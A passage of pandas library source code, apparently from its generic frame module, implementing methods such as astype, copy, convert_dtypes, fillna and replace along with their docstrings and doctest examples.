    .. warning::

       We recommend using :meth:`DataFrame.to_numpy` instead.

    Only the values in the DataFrame will be returned; the axes labels
    will be removed.

    Returns
    -------
    numpy.ndarray
        The values of the DataFrame.

    See Also
    --------
    DataFrame.to_numpy : Recommended alternative to this method.
    DataFrame.index : Retrieve the index labels.
    DataFrame.columns : Retrieving the column names.

    Notes
    -----
    The dtype of the returned array is the lowest common denominator of
    the column dtypes (implicit upcasting): e.g. float16 mixed with
    float32 upcasts to float32, int32 with uint8 to int32, and by
    :func:`numpy.find_common_type` convention int64 mixed with uint64
    yields float64. A frame mixing e.g. strings and numbers produces an
    ``object`` array holding Python objects. Use with care if you are
    not dealing with the blocks.
    """
    # Group same-dtype data into contiguous blocks before exporting.
    self._consolidate_inplace()
    arr = self._data.as_array(transpose=self._AXIS_REVERSED)
    return arr
@property
def _values(self) -> np.ndarray:
    """Internal implementation; delegates to ``values``."""
    return self.values
def _internal_get_values(self) -> np.ndarray:
    """
    Return an ndarray after converting sparse values to dense.
    This is the same as ``.values`` for non-sparse data. For sparse
    data contained in a `SparseArray`, the data are first
    converted to a dense representation.
    Returns
    -------
    numpy.ndarray
        Numpy representation of DataFrame.
    See Also
    --------
    values : Numpy representation of DataFrame.
    SparseArray : Container for sparse data.
    """
    # Base implementation simply delegates to ``values``.
    return self.values
@property
def dtypes(self):
    """
    Return the dtypes in the DataFrame.

    This returns a Series with the data type of each column. The
    result's index is the original DataFrame's columns. Columns with
    mixed types are stored with the ``object`` dtype. See
    :ref:`the User Guide <basics.dtypes>` for more.

    Returns
    -------
    pandas.Series
        The data type of each column.

    Examples
    --------
    >>> df = pd.DataFrame({'float': [1.0],
    ...                    'int': [1],
    ...                    'datetime': [pd.Timestamp('20180310')],
    ...                    'string': ['foo']})
    >>> df.dtypes
    float              float64
    int                  int64
    datetime    datetime64[ns]
    string              object
    dtype: object
    """
    from pandas import Series

    # One entry per info-axis label; object dtype keeps the numpy dtype
    # objects themselves as the Series values.
    dtype_values = self._data.get_dtypes()
    return Series(dtype_values, index=self._info_axis, dtype=np.object_)
def _to_dict_of_blocks(self, copy: bool_t = True):
    """
    Return a dict of dtype -> Constructor Types that
    each is a homogeneous dtype.

    Internal ONLY
    """
    out = {}
    for dtype_key, block_data in self._data.to_dict(copy=copy).items():
        # Wrap each homogeneous block back in the caller's type.
        out[dtype_key] = self._constructor(block_data).__finalize__(self)
    return out
def astype(
    self: FrameOrSeries, dtype, copy: bool_t = True, errors: str = "raise"
) -> FrameOrSeries:
    """
    Cast a pandas object to a specified dtype ``dtype``.
    Parameters
    ----------
    dtype : data type, or dict of column name -> data type
        Use a numpy.dtype or Python type to cast entire pandas object to
        the same type. Alternatively, use {col: dtype, ...}, where col is a
        column label and dtype is a numpy.dtype or Python type to cast one
        or more of the DataFrame's columns to column-specific types.
    copy : bool, default True
        Return a copy when ``copy=True`` (be very careful setting
        ``copy=False`` as changes to values then may propagate to other
        pandas objects).
    errors : {'raise', 'ignore'}, default 'raise'
        Control raising of exceptions on invalid data for provided dtype.
        - ``raise`` : allow exceptions to be raised
        - ``ignore`` : suppress exceptions. On error return original object.
    Returns
    -------
    casted : same type as caller
    See Also
    --------
    to_datetime : Convert argument to datetime.
    to_timedelta : Convert argument to timedelta.
    to_numeric : Convert argument to a numeric type.
    numpy.ndarray.astype : Cast a numpy array to a specified type.
    Examples
    --------
    Create a DataFrame:
    >>> d = {'col1': [1, 2], 'col2': [3, 4]}
    >>> df = pd.DataFrame(data=d)
    >>> df.dtypes
    col1    int64
    col2    int64
    dtype: object
    Cast all columns to int32:
    >>> df.astype('int32').dtypes
    col1    int32
    col2    int32
    dtype: object
    Cast col1 to int32 using a dictionary:
    >>> df.astype({'col1': 'int32'}).dtypes
    col1    int32
    col2    int64
    dtype: object
    Create a series:
    >>> ser = pd.Series([1, 2], dtype='int32')
    >>> ser
    0    1
    1    2
    dtype: int32
    >>> ser.astype('int64')
    0    1
    1    2
    dtype: int64
    Convert to categorical type:
    >>> ser.astype('category')
    0    1
    1    2
    dtype: category
    Categories (2, int64): [1, 2]
    Convert to ordered categorical type with custom ordering:
    >>> cat_dtype = pd.api.types.CategoricalDtype(
    ...     categories=[2, 1], ordered=True)
    >>> ser.astype(cat_dtype)
    0    1
    1    2
    dtype: category
    Categories (2, int64): [2 < 1]
    Note that using ``copy=False`` and changing data on a new
    pandas object may propagate changes:
    >>> s1 = pd.Series([1, 2])
    >>> s2 = s1.astype('int64', copy=False)
    >>> s2[0] = 10
    >>> s1 # note that s1[0] has changed too
    0    10
    1     2
    dtype: int64
    """
    if is_dict_like(dtype):
        # Mapping of label -> dtype: validate the keys, then cast the
        # matching columns one by one.
        if self.ndim == 1: # i.e. Series
            if len(dtype) > 1 or self.name not in dtype:
                raise KeyError(
                    "Only the Series name can be used for "
                    "the key in Series dtype mappings."
                )
            new_type = dtype[self.name]
            return self.astype(new_type, copy, errors)
        for col_name in dtype.keys():
            if col_name not in self:
                raise KeyError(
                    "Only a column name can be used for the "
                    "key in a dtype mappings argument."
                )
        results = []
        for col_name, col in self.items():
            if col_name in dtype:
                results.append(
                    col.astype(dtype=dtype[col_name], copy=copy, errors=errors)
                )
            else:
                # Column not mentioned in the mapping: keep as-is
                # (copied when copy=True).
                results.append(col.copy() if copy else col)
    elif is_extension_array_dtype(dtype) and self.ndim > 1:
        # GH 18099/22869: columnwise conversion to extension dtype
        # GH 24704: use iloc to handle duplicate column names
        results = [
            self.iloc[:, i].astype(dtype, copy=copy)
            for i in range(len(self.columns))
        ]
    else:
        # else, only a single dtype is given
        new_data = self._data.astype(dtype=dtype, copy=copy, errors=errors)
        return self._constructor(new_data).__finalize__(self)
    # GH 19920: retain column metadata after concat
    result = pd.concat(results, axis=1, copy=False)
    result.columns = self.columns
    return result
def copy(self: FrameOrSeries, deep: bool_t = True) -> FrameOrSeries:
    """
    Make a copy of this object's indices and data.

    When ``deep=True`` (default), a new object is created with a copy of
    the calling object's data and indices, so modifications to the copy
    are not reflected in the original. When ``deep=False``, the new
    object shares data and index with the original (only references are
    copied), so changes to either are visible in both.

    Parameters
    ----------
    deep : bool, default True
        Make a deep copy, including a copy of the data and the indices.
        With ``deep=False`` neither the indices nor the data are copied.

    Returns
    -------
    copy : Series or DataFrame
        Object type matches caller.

    Notes
    -----
    When ``deep=True``, data is copied but actual Python objects inside
    it are not copied recursively — only references to them are. This
    contrasts with ``copy.deepcopy`` in the Standard Library, which
    copies object data recursively; updating a nested data object is
    therefore reflected in the deep copy.

    While ``Index`` objects are copied when ``deep=True``, the
    underlying numpy array is not copied for performance reasons; since
    ``Index`` is immutable the underlying data can be safely shared.

    Examples
    --------
    >>> s = pd.Series([1, 2], index=["a", "b"])
    >>> s_copy = s.copy()
    >>> s_copy
    a    1
    b    2
    dtype: int64

    Shallow copy shares data and index with the original:

    >>> shallow = s.copy(deep=False)
    >>> s.values is shallow.values and s.index is shallow.index
    True

    Deep copy has its own data and index:

    >>> deep = s.copy()
    >>> s.values is deep.values or s.index is deep.index
    False
    """
    copied_data = self._data.copy(deep=deep)
    return self._constructor(copied_data).__finalize__(self)
def __copy__(self: FrameOrSeries, deep: bool_t = True) -> FrameOrSeries:
    # Support for copy.copy(); delegates to the public copy() method.
    return self.copy(deep=deep)
def __deepcopy__(self: FrameOrSeries, memo=None) -> FrameOrSeries:
    """
    Support for copy.deepcopy(); delegates to ``copy(deep=True)``.
    Parameters
    ----------
    memo, default None
        Standard signature. Unused
    """
    return self.copy(deep=True)
def _convert(
    self: FrameOrSeries,
    datetime: bool_t = False,
    numeric: bool_t = False,
    timedelta: bool_t = False,
    coerce: bool_t = False,
    copy: bool_t = True,
) -> FrameOrSeries:
    """
    Attempt to infer better dtype for object columns.

    Parameters
    ----------
    datetime : bool, default False
        If True, convert to date where possible.
    numeric : bool, default False
        If True, attempt to convert to numbers (including strings),
        with unconvertible values becoming NaN.
    timedelta : bool, default False
        If True, convert to timedelta where possible.
    coerce : bool, default False
        If True, force conversion with unconvertible values converted
        to nulls (NaN or NaT).
    copy : bool, default True
        If True, return a copy even if no copy is necessary (e.g. no
        conversion was done). Note: This is meant for internal use, and
        should not be confused with inplace.

    Returns
    -------
    converted : same as input object
    """
    # Reject any non-boolean flag up front.
    for flag_name, flag in (
        ("datetime", datetime),
        ("numeric", numeric),
        ("timedelta", timedelta),
        ("coerce", coerce),
        ("copy", copy),
    ):
        validate_bool_kwarg(flag, flag_name)
    converted = self._data.convert(
        datetime=datetime,
        numeric=numeric,
        timedelta=timedelta,
        coerce=coerce,
        copy=copy,
    )
    return self._constructor(converted).__finalize__(self)
def infer_objects(self: FrameOrSeries) -> FrameOrSeries:
    """
    Attempt to infer better dtypes for object columns.

    Performs soft conversion of object-dtyped columns, leaving
    non-object and unconvertible columns unchanged. The inference rules
    are the same as during normal Series/DataFrame construction.

    .. versionadded:: 0.21.0

    Returns
    -------
    converted : same type as input object

    See Also
    --------
    to_datetime : Convert argument to datetime.
    to_timedelta : Convert argument to timedelta.
    to_numeric : Convert argument to numeric type.
    convert_dtypes : Convert argument to best possible dtype.

    Examples
    --------
    >>> df = pd.DataFrame({"A": ["a", 1, 2, 3]})
    >>> df = df.iloc[1:]
    >>> df.dtypes
    A    object
    dtype: object
    >>> df.infer_objects().dtypes
    A    int64
    dtype: object
    """
    # numeric=False so only soft conversion happens; Python objects are
    # still converted to native numpy numeric types.
    soft_converted = self._data.convert(
        datetime=True, numeric=False, timedelta=True, coerce=False, copy=True
    )
    return self._constructor(soft_converted).__finalize__(self)
def convert_dtypes(
    self: FrameOrSeries,
    infer_objects: bool_t = True,
    convert_string: bool_t = True,
    convert_integer: bool_t = True,
    convert_boolean: bool_t = True,
) -> FrameOrSeries:
    """
    Convert columns to best possible dtypes using dtypes supporting ``pd.NA``.

    .. versionadded:: 1.0.0

    Parameters
    ----------
    infer_objects : bool, default True
        Whether object dtypes should be converted to the best possible types.
    convert_string : bool, default True
        Whether object dtypes should be converted to ``StringDtype()``.
    convert_integer : bool, default True
        Whether, if possible, conversion can be done to integer extension types.
    convert_boolean : bool, defaults True
        Whether object dtypes should be converted to ``BooleanDtypes()``.

    Returns
    -------
    Series or DataFrame
        Copy of input object with new dtype.

    See Also
    --------
    infer_objects : Infer dtypes of objects.
    to_datetime : Convert argument to datetime.
    to_timedelta : Convert argument to timedelta.
    to_numeric : Convert argument to a numeric type.

    Notes
    -----
    By default, ``convert_dtypes`` will attempt to convert a Series (or
    each Series in a DataFrame) to dtypes that support ``pd.NA``. The
    ``convert_string``, ``convert_integer``, and ``convert_boolean``
    options turn off individual conversions to ``StringDtype``, the
    integer extension types, or ``BooleanDtype``, respectively.

    For object-dtyped columns, if ``infer_objects`` is ``True``, the
    same inference rules apply as during normal Series/DataFrame
    construction; then, if possible, values convert to ``StringDtype``,
    ``BooleanDtype`` or an appropriate integer extension type, and
    otherwise stay ``object``. Integer dtypes, and numeric dtypes whose
    values are all integers, convert to an appropriate integer extension
    type. As new ``pd.NA``-capable dtypes are added in the future, the
    results of this method will change to support them.

    Examples
    --------
    >>> s = pd.Series(["a", "b", np.nan])
    >>> s
    0      a
    1      b
    2    NaN
    dtype: object
    >>> s.convert_dtypes()
    0       a
    1       b
    2    <NA>
    dtype: string
    """
    conversion_flags = (
        infer_objects,
        convert_string,
        convert_integer,
        convert_boolean,
    )
    if self.ndim == 1:
        # Series: convert directly.
        return self._convert_dtypes(*conversion_flags)
    # DataFrame: convert column by column, then reassemble.
    converted_cols = [
        col._convert_dtypes(*conversion_flags) for _, col in self.items()
    ]
    return pd.concat(converted_cols, axis=1, copy=False)
# ----------------------------------------------------------------------
# Filling NA's
@doc(**_shared_doc_kwargs)
def fillna(
    self: FrameOrSeries,
    value=None,
    method=None,
    axis=None,
    inplace: bool_t = False,
    limit=None,
    downcast=None,
) -> Optional[FrameOrSeries]:
    """
    Fill NA/NaN values using the specified method.
    Parameters
    ----------
    value : scalar, dict, Series, or DataFrame
        Value to use to fill holes (e.g. 0), alternately a
        dict/Series/DataFrame of values specifying which value to use for
        each index (for a Series) or column (for a DataFrame). Values not
        in the dict/Series/DataFrame will not be filled. This value cannot
        be a list.
    method : {{'backfill', 'bfill', 'pad', 'ffill', None}}, default None
        Method to use for filling holes in reindexed Series
        pad / ffill: propagate last valid observation forward to next valid
        backfill / bfill: use next valid observation to fill gap.
    axis : {axes_single_arg}
        Axis along which to fill missing values.
    inplace : bool, default False
        If True, fill in-place. Note: this will modify any
        other views on this object (e.g., a no-copy slice for a column in a
        DataFrame).
    limit : int, default None
        If method is specified, this is the maximum number of consecutive
        NaN values to forward/backward fill. In other words, if there is
        a gap with more than this number of consecutive NaNs, it will only
        be partially filled. If method is not specified, this is the
        maximum number of entries along the entire axis where NaNs will be
        filled. Must be greater than 0 if not None.
    downcast : dict, default is None
        A dict of item->dtype of what to downcast if possible,
        or the string 'infer' which will try to downcast to an appropriate
        equal type (e.g. float64 to int64 if possible).
    Returns
    -------
    {klass} or None
        Object with missing values filled or None if ``inplace=True``.
    See Also
    --------
    interpolate : Fill NaN values using interpolation.
    reindex : Conform object to new index.
    asfreq : Convert TimeSeries to specified frequency.
    Examples
    --------
    >>> df = pd.DataFrame([[np.nan, 2, np.nan, 0],
    ...                    [3, 4, np.nan, 1],
    ...                    [np.nan, np.nan, np.nan, 5],
    ...                    [np.nan, 3, np.nan, 4]],
    ...                   columns=list('ABCD'))
    >>> df
         A    B   C  D
    0  NaN  2.0 NaN  0
    1  3.0  4.0 NaN  1
    2  NaN  NaN NaN  5
    3  NaN  3.0 NaN  4
    Replace all NaN elements with 0s.
    >>> df.fillna(0)
        A   B   C   D
    0   0.0 2.0 0.0 0
    1   3.0 4.0 0.0 1
    2   0.0 0.0 0.0 5
    3   0.0 3.0 0.0 4
    We can also propagate non-null values forward or backward.
    >>> df.fillna(method='ffill')
        A   B   C   D
    0   NaN 2.0 NaN 0
    1   3.0 4.0 NaN 1
    2   3.0 4.0 NaN 5
    3   3.0 3.0 NaN 4
    Replace all NaN elements in column 'A', 'B', 'C', and 'D', with 0, 1,
    2, and 3 respectively.
    >>> values = {{'A': 0, 'B': 1, 'C': 2, 'D': 3}}
    >>> df.fillna(value=values)
        A   B   C   D
    0   0.0 2.0 2.0 0
    1   3.0 4.0 2.0 1
    2   0.0 1.0 2.0 5
    3   0.0 3.0 2.0 4
    Only replace the first NaN element.
    >>> df.fillna(value=values, limit=1)
        A   B   C   D
    0   0.0 2.0 2.0 0
    1   3.0 4.0 NaN 1
    2   NaN 1.0 NaN 5
    3   NaN 3.0 NaN 4
    """
    inplace = validate_bool_kwarg(inplace, "inplace")
    value, method = validate_fillna_kwargs(value, method)
    self._consolidate_inplace()
    # set the default here, so functions examining the signature
    # can detect if something was set (e.g. in groupby) (GH9221)
    if axis is None:
        axis = 0
    axis = self._get_axis_number(axis)
    if value is None:
        # No fill value given: fill by propagation (pad/backfill) via the
        # block manager's interpolate machinery.
        if self._is_mixed_type and axis == 1:
            if inplace:
                raise NotImplementedError()
            # Row-wise fill on mixed types: operate on the transpose.
            result = self.T.fillna(method=method, limit=limit).T
            # need to downcast here because of all of the transposes
            result._data = result._data.downcast()
            return result
        new_data = self._data.interpolate(
            method=method,
            axis=axis,
            limit=limit,
            inplace=inplace,
            coerce=True,
            downcast=downcast,
        )
    else:
        if len(self._get_axis(axis)) == 0:
            # Empty axis: nothing to fill.
            return self
        if self.ndim == 1:
            # Series: accept a scalar or a dict/Series mapping of
            # index label -> fill value; reject other list-likes.
            if isinstance(value, (dict, ABCSeries)):
                value = create_series_with_explicit_dtype(
                    value, dtype_if_empty=object
                )
            elif not is_list_like(value):
                pass
            else:
                raise TypeError(
                    '"value" parameter must be a scalar, dict '
                    "or Series, but you passed a "
                    f'"{type(value).__name__}"'
                )
            new_data = self._data.fillna(
                value=value, limit=limit, inplace=inplace, downcast=downcast
            )
        elif isinstance(value, (dict, ABCSeries)):
            # DataFrame with per-column fill values: fill each named
            # column in place on the (possibly copied) result.
            if axis == 1:
                raise NotImplementedError(
                    "Currently only can fill "
                    "with dict/Series column "
                    "by column"
                )
            result = self if inplace else self.copy()
            for k, v in value.items():
                if k not in result:
                    continue
                obj = result[k]
                obj.fillna(v, limit=limit, inplace=True, downcast=downcast)
            return result if not inplace else None
        elif not is_list_like(value):
            # Scalar fill value applied across the whole object.
            new_data = self._data.fillna(
                value=value, limit=limit, inplace=inplace, downcast=downcast
            )
        elif isinstance(value, ABCDataFrame) and self.ndim == 2:
            # DataFrame fill value: take from ``value`` wherever self is NA.
            new_data = self.where(self.notna(), value)
        else:
            raise ValueError(f"invalid fill value with a {type(value)}")
    if inplace:
        self._update_inplace(new_data)
        return None
    else:
        return self._constructor(new_data).__finalize__(self)
def ffill(
    self: FrameOrSeries,
    axis=None,
    inplace: bool_t = False,
    limit=None,
    downcast=None,
) -> Optional[FrameOrSeries]:
    """
    Synonym for :meth:`DataFrame.fillna` with ``method='ffill'``.

    Returns
    -------
    %(klass)s or None
        Object with missing values filled or None if ``inplace=True``.
    """
    # Forward fill: delegate to fillna with the method pinned.
    fill_kwargs = dict(
        method="ffill", axis=axis, inplace=inplace, limit=limit, downcast=downcast
    )
    return self.fillna(**fill_kwargs)
def bfill(
    self: FrameOrSeries,
    axis=None,
    inplace: bool_t = False,
    limit=None,
    downcast=None,
) -> Optional[FrameOrSeries]:
    """
    Synonym for :meth:`DataFrame.fillna` with ``method='bfill'``.

    Returns
    -------
    %(klass)s or None
        Object with missing values filled or None if ``inplace=True``.
    """
    # Backward fill simply delegates to fillna with method='bfill'.
    return self.fillna(
        method="bfill",
        axis=axis,
        inplace=inplace,
        limit=limit,
        downcast=downcast,
    )
# Shared docstring template for Series.replace / DataFrame.replace.
# The %(klass)s placeholders are filled in per-class via
# ``@Appender(_shared_docs["replace"] % _shared_doc_kwargs)``.
_shared_docs[
    "replace"
] = """
Replace values given in `to_replace` with `value`.
Values of the %(klass)s are replaced with other values dynamically.
This differs from updating with ``.loc`` or ``.iloc``, which require
you to specify a location to update with some value.
Parameters
----------
to_replace : str, regex, list, dict, Series, int, float, or None
How to find the values that will be replaced.
* numeric, str or regex:
- numeric: numeric values equal to `to_replace` will be
replaced with `value`
- str: string exactly matching `to_replace` will be replaced
with `value`
- regex: regexs matching `to_replace` will be replaced with
`value`
* list of str, regex, or numeric:
- First, if `to_replace` and `value` are both lists, they
**must** be the same length.
- Second, if ``regex=True`` then all of the strings in **both**
lists will be interpreted as regexs otherwise they will match
directly. This doesn't matter much for `value` since there
are only a few possible substitution regexes you can use.
- str, regex and numeric rules apply as above.
* dict:
- Dicts can be used to specify different replacement values
for different existing values. For example,
``{'a': 'b', 'y': 'z'}`` replaces the value 'a' with 'b' and
'y' with 'z'. To use a dict in this way the `value`
parameter should be `None`.
- For a DataFrame a dict can specify that different values
should be replaced in different columns. For example,
``{'a': 1, 'b': 'z'}`` looks for the value 1 in column 'a'
and the value 'z' in column 'b' and replaces these values
with whatever is specified in `value`. The `value` parameter
should not be ``None`` in this case. You can treat this as a
special case of passing two lists except that you are
specifying the column to search in.
- For a DataFrame nested dictionaries, e.g.,
``{'a': {'b': np.nan}}``, are read as follows: look in column
'a' for the value 'b' and replace it with NaN. The `value`
parameter should be ``None`` to use a nested dict in this
way. You can nest regular expressions as well. Note that
column names (the top-level dictionary keys in a nested
dictionary) **cannot** be regular expressions.
* None:
- This means that the `regex` argument must be a string,
compiled regular expression, or list, dict, ndarray or
Series of such elements. If `value` is also ``None`` then
this **must** be a nested dictionary or Series.
See the examples section for examples of each of these.
value : scalar, dict, list, str, regex, default None
Value to replace any values matching `to_replace` with.
For a DataFrame a dict of values can be used to specify which
value to use for each column (columns not in the dict will not be
filled). Regular expressions, strings and lists or dicts of such
objects are also allowed.
inplace : bool, default False
If True, in place. Note: this will modify any
other views on this object (e.g. a column from a DataFrame).
Returns the caller if this is True.
limit : int, default None
Maximum size gap to forward or backward fill.
regex : bool or same types as `to_replace`, default False
Whether to interpret `to_replace` and/or `value` as regular
expressions. If this is ``True`` then `to_replace` *must* be a
string. Alternatively, this could be a regular expression or a
list, dict, or array of regular expressions in which case
`to_replace` must be ``None``.
method : {'pad', 'ffill', 'bfill', `None`}
The method to use when for replacement, when `to_replace` is a
scalar, list or tuple and `value` is ``None``.
.. versionchanged:: 0.23.0
Added to DataFrame.
Returns
-------
%(klass)s
Object after replacement.
Raises
------
AssertionError
* If `regex` is not a ``bool`` and `to_replace` is not
``None``.
TypeError
* If `to_replace` is not a scalar, array-like, ``dict``, or ``None``
* If `to_replace` is a ``dict`` and `value` is not a ``list``,
``dict``, ``ndarray``, or ``Series``
* If `to_replace` is ``None`` and `regex` is not compilable
into a regular expression or is a list, dict, ndarray, or
Series.
* When replacing multiple ``bool`` or ``datetime64`` objects and
the arguments to `to_replace` does not match the type of the
value being replaced
ValueError
* If a ``list`` or an ``ndarray`` is passed to `to_replace` and
`value` but they are not the same length.
See Also
--------
%(klass)s.fillna : Fill NA values.
%(klass)s.where : Replace values based on boolean condition.
Series.str.replace : Simple string replacement.
Notes
-----
* Regex substitution is performed under the hood with ``re.sub``. The
rules for substitution for ``re.sub`` are the same.
* Regular expressions will only substitute on strings, meaning you
cannot provide, for example, a regular expression matching floating
point numbers and expect the columns in your frame that have a
numeric dtype to be matched. However, if those floating point
numbers *are* strings, then you can do this.
* This method has *a lot* of options. You are encouraged to experiment
and play with this method to gain intuition about how it works.
* When dict is used as the `to_replace` value, it is like
key(s) in the dict are the to_replace part and
value(s) in the dict are the value parameter.
Examples
--------
**Scalar `to_replace` and `value`**
>>> s = pd.Series([0, 1, 2, 3, 4])
>>> s.replace(0, 5)
0 5
1 1
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame({'A': [0, 1, 2, 3, 4],
... 'B': [5, 6, 7, 8, 9],
... 'C': ['a', 'b', 'c', 'd', 'e']})
>>> df.replace(0, 5)
A B C
0 5 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
**List-like `to_replace`**
>>> df.replace([0, 1, 2, 3], 4)
A B C
0 4 5 a
1 4 6 b
2 4 7 c
3 4 8 d
4 4 9 e
>>> df.replace([0, 1, 2, 3], [4, 3, 2, 1])
A B C
0 4 5 a
1 3 6 b
2 2 7 c
3 1 8 d
4 4 9 e
>>> s.replace([1, 2], method='bfill')
0 0
1 3
2 3
3 3
4 4
dtype: int64
**dict-like `to_replace`**
>>> df.replace({0: 10, 1: 100})
A B C
0 10 5 a
1 100 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': 0, 'B': 5}, 100)
A B C
0 100 100 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': {0: 100, 4: 400}})
A B C
0 100 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 400 9 e
**Regular expression `to_replace`**
>>> df = pd.DataFrame({'A': ['bat', 'foo', 'bait'],
... 'B': ['abc', 'bar', 'xyz']})
>>> df.replace(to_replace=r'^ba.$', value='new', regex=True)
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace({'A': r'^ba.$'}, {'A': 'new'}, regex=True)
A B
0 new abc
1 foo bar
2 bait xyz
>>> df.replace(regex=r'^ba.$', value='new')
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})
A B
0 new abc
1 xyz new
2 bait xyz
>>> df.replace(regex=[r'^ba.$', 'foo'], value='new')
A B
0 new abc
1 new new
2 bait xyz
Note that when replacing multiple ``bool`` or ``datetime64`` objects,
the data types in the `to_replace` parameter must match the data
type of the value being replaced:
>>> df = pd.DataFrame({'A': [True, False, True],
... 'B': [False, True, False]})
>>> df.replace({'a string': 'new value', True: False}) # raises
Traceback (most recent call last):
...
TypeError: Cannot compare types 'ndarray(dtype=bool)' and 'str'
This raises a ``TypeError`` because one of the ``dict`` keys is not of
the correct type for replacement.
Compare the behavior of ``s.replace({'a': None})`` and
``s.replace('a', None)`` to understand the peculiarities
of the `to_replace` parameter:
>>> s = pd.Series([10, 'a', 'a', 'b', 'a'])
When one uses a dict as the `to_replace` value, it is like the
value(s) in the dict are equal to the `value` parameter.
``s.replace({'a': None})`` is equivalent to
``s.replace(to_replace={'a': None}, value=None, method=None)``:
>>> s.replace({'a': None})
0 10
1 None
2 None
3 b
4 None
dtype: object
When ``value=None`` and `to_replace` is a scalar, list or
tuple, `replace` uses the method parameter (default 'pad') to do the
replacement. So this is why the 'a' values are being replaced by 10
in rows 1 and 2 and 'b' in row 4 in this case.
The command ``s.replace('a', None)`` is actually equivalent to
``s.replace(to_replace='a', value=None, method='pad')``:
>>> s.replace('a', None)
0 10
1 10
2 10
3 b
4 b
dtype: object
"""
@Appender(_shared_docs["replace"] % _shared_doc_kwargs)
def replace(
    self,
    to_replace=None,
    value=None,
    inplace=False,
    limit=None,
    regex=False,
    method="pad",
):
    # No docstring here: @Appender composes __doc__ from the shared
    # template; adding one would change the rendered documentation.

    # Validate to_replace up front; everything else is dispatched on
    # its type (scalar / list-like / dict-like / None) below.
    if not (
        is_scalar(to_replace)
        or isinstance(to_replace, pd.Series)
        or is_re_compilable(to_replace)
        or is_list_like(to_replace)
    ):
        raise TypeError(
            "Expecting 'to_replace' to be either a scalar, array-like, "
            "dict or None, got invalid type "
            f"{repr(type(to_replace).__name__)}"
        )

    inplace = validate_bool_kwarg(inplace, "inplace")
    if not is_bool(regex) and to_replace is not None:
        raise AssertionError("'to_replace' must be 'None' if 'regex' is not a bool")

    self._consolidate_inplace()

    if value is None:
        # passing a single value that is scalar like
        # when value is None (GH5319), for compat
        if not is_dict_like(to_replace) and not is_dict_like(regex):
            to_replace = [to_replace]

        if isinstance(to_replace, (tuple, list)):
            # value=None with a list/tuple of targets: fill the matched
            # positions using `method` (pad/ffill/bfill) instead of a value.
            if isinstance(self, ABCDataFrame):
                return self.apply(
                    _single_replace, args=(to_replace, method, inplace, limit)
                )
            return _single_replace(self, to_replace, method, inplace, limit)

        if not is_dict_like(to_replace):
            if not is_dict_like(regex):
                raise TypeError(
                    'If "to_replace" and "value" are both None '
                    'and "to_replace" is not a list, then '
                    "regex must be a mapping"
                )
            # Mapping passed via `regex=`: treat it as the to_replace
            # mapping with regex matching turned on.
            to_replace = regex
            regex = True

        items = list(to_replace.items())
        keys, values = zip(*items) if items else ([], [])

        # Nested mappings ({'col': {old: new}}) must be all-or-nothing.
        are_mappings = [is_dict_like(v) for v in values]

        if any(are_mappings):
            if not all(are_mappings):
                raise TypeError(
                    "If a nested mapping is passed, all values "
                    "of the top level mapping must be mappings"
                )
            # passed a nested dict/Series
            # Split {'col': {old: new}} into per-column to_replace/value
            # lists, then recurse once with the flattened form.
            to_rep_dict = {}
            value_dict = {}

            for k, v in items:
                keys, values = list(zip(*v.items())) or ([], [])
                to_rep_dict[k] = list(keys)
                value_dict[k] = list(values)

            to_replace, value = to_rep_dict, value_dict
        else:
            # Flat mapping {old: new}: keys become targets, values the
            # replacements.
            to_replace, value = keys, values

        return self.replace(
            to_replace, value, inplace=inplace, limit=limit, regex=regex
        )
    else:
        # need a non-zero len on all axes
        if not self.size:
            return self

        new_data = self._data
        if is_dict_like(to_replace):
            if is_dict_like(value):  # {'A' : NA} -> {'A' : 0}
                # Per-column replacement; delegate to Series.replace
                # column by column.
                res = self if inplace else self.copy()
                for c, src in to_replace.items():
                    if c in value and c in self:
                        # object conversion is handled in
                        # series.replace which is called recursively
                        res[c] = res[c].replace(
                            to_replace=src,
                            value=value[c],
                            inplace=False,
                            regex=regex,
                        )
                return None if inplace else res

            # {'A': NA} -> 0
            elif not is_list_like(value):
                # Same scalar replacement restricted to each listed
                # column; only the last pass is allowed to downcast
                # (convert=True).
                keys = [(k, src) for k, src in to_replace.items() if k in self]
                keys_len = len(keys) - 1
                for i, (k, src) in enumerate(keys):
                    convert = i == keys_len
                    new_data = new_data.replace(
                        to_replace=src,
                        value=value,
                        filter=[k],
                        inplace=inplace,
                        regex=regex,
                        convert=convert,
                    )
            else:
                raise TypeError("value argument must be scalar, dict, or Series")

        elif is_list_like(to_replace):  # [NA, ''] -> [0, 'missing']
            if is_list_like(value):
                if len(to_replace) != len(value):
                    raise ValueError(
                        f"Replacement lists must match in length. "
                        f"Expecting {len(to_replace)} got {len(value)} "
                    )

                new_data = self._data.replace_list(
                    src_list=to_replace,
                    dest_list=value,
                    inplace=inplace,
                    regex=regex,
                )

            else:  # [NA, ''] -> 0
                new_data = self._data.replace(
                    to_replace=to_replace, value=value, inplace=inplace, regex=regex
                )
        elif to_replace is None:
            # Pure regex form: df.replace(regex=..., value=...).
            if not (
                is_re_compilable(regex)
                or is_list_like(regex)
                or is_dict_like(regex)
            ):
                raise TypeError(
                    f"'regex' must be a string or a compiled regular expression "
                    f"or a list or dict of strings or regular expressions, "
                    f"you passed a {repr(type(regex).__name__)}"
                )
            return self.replace(
                regex, value, inplace=inplace, limit=limit, regex=True
            )
        else:

            # dest iterable dict-like
            if is_dict_like(value):  # NA -> {'A' : 0, 'B' : -1}
                # Scalar target, per-column replacement values.
                new_data = self._data
                for k, v in value.items():
                    if k in self:
                        new_data = new_data.replace(
                            to_replace=to_replace,
                            value=v,
                            filter=[k],
                            inplace=inplace,
                            regex=regex,
                        )

            elif not is_list_like(value):  # NA -> 0
                new_data = self._data.replace(
                    to_replace=to_replace, value=value, inplace=inplace, regex=regex
                )
            else:
                raise TypeError(
                    f'Invalid "to_replace" type: {repr(type(to_replace).__name__)}'
                )

        if inplace:
            self._update_inplace(new_data)
        else:
            return self._constructor(new_data).__finalize__(self)
# Shared docstring template for Series.interpolate / DataFrame.interpolate,
# consumed by ``@Appender(_shared_docs["interpolate"] % _shared_doc_kwargs)``.
_shared_docs[
